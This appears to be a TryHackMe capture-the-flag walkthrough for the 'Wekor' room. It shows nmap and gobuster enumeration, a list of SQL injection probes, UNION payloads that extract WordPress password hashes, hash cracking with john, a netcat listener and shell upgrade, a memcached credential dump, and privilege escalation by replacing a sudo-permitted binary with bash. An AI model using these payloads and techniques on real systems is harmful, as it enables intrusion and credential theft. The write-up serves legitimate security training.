Wekor

Room Link: https://tryhackme.com/room/wekorra

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u $VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali

gobuster dir -u $VICTIM/workshop/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali

gobuster dir -u $VICTIM/root/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali

gobuster dir -u $VICTIM/lol/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali

gobuster dir -u $VICTIM/agent/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali

gobuster dir -u $VICTIM/feed/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali

gobuster dir -u $VICTIM/crawler/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali

gobuster dir -u $VICTIM/boot/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali

gobuster dir -u $VICTIM/comingreallysoon/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali

gobuster dir -u $VICTIM/interesting/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Save request into a file

SQL Injection

List

'
"
`
')
")
`)
'))
"))
`))
1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+
1' ORDER BY 4--+
1' GROUP BY 1--+
1' GROUP BY 2--+
1' GROUP BY 3--+
1' GROUP BY 4--+
1' UNION SELECT null-- -
1' UNION SELECT null,null-- -
1' UNION SELECT null,null,null-- -
1' UNION SELECT null,null,null,null-- -
1' UNION SELECT null,null,null,null,null-- -

Get version

Sql

1'%20UNION%20SELECT%20null,null,VERSION()--%20

Display all database names

Sql

1'%20UNION%20SELECT%20null,null,table_schema from information_schema.columns--%20

Display tables inside wordpress database

Sql

1'%20UNION%20SELECT%20null,null,concat(table_name) from information_schema.columns where table_schema='wordpress'--%20

Display all columns of wp_users table

Sql

1'%20UNION%20SELECT%20null,null,concat(column_name) from information_schema.columns where table_schema='wordpress'and table_name='wp_users' --%20

Display results of userlogin, user_pass, and user_activation_key columns

Sql

1'%20UNION%20SELECT%20concat(user_login),concat(user_pass),concat(user_activation_key) from wordpress.wp_users--%20

We have some credentials but they don't work for SSH. So there is info we are missing

Kali

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john  hash.txt --show

Sql

1'%20UNION%20SELECT%20concat(user_url),concat(user_email),concat(user_nicename) from wordpress.wp_users--%20

I added just the wekor site since the others are .com sites so I doubt they are being used.

We can see the site

We can login with all accounts but yura is a admin

Credentials

Username: wp_yura
Password: soccer13

Initial Shell

Kali

nc -lvnp 1337

Get autocomplete

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Victim

ss -ltp

TCP/11211 - Memcache

Victim

cd /usr/share/memcached/scripts/  
./memcached-tool localhost:1121 dump

Lateral Movement

I couldn't ssh into the host but could su from www-data

Victim

su Orka
Password: OrkAiSC00L24/7$

Privilege Escalation

Victim

sudo -l

I couldn't really do anything with the bitcoin application itself but I could move the folder desktop and then replace the bitcoin with bash

Victim

cd /home/Orka
mv Desktop/ bakup
mkdir Desktop
cp /bin/bash Desktop/bitcoin
sudo /home/Orka/Desktop/bitcoin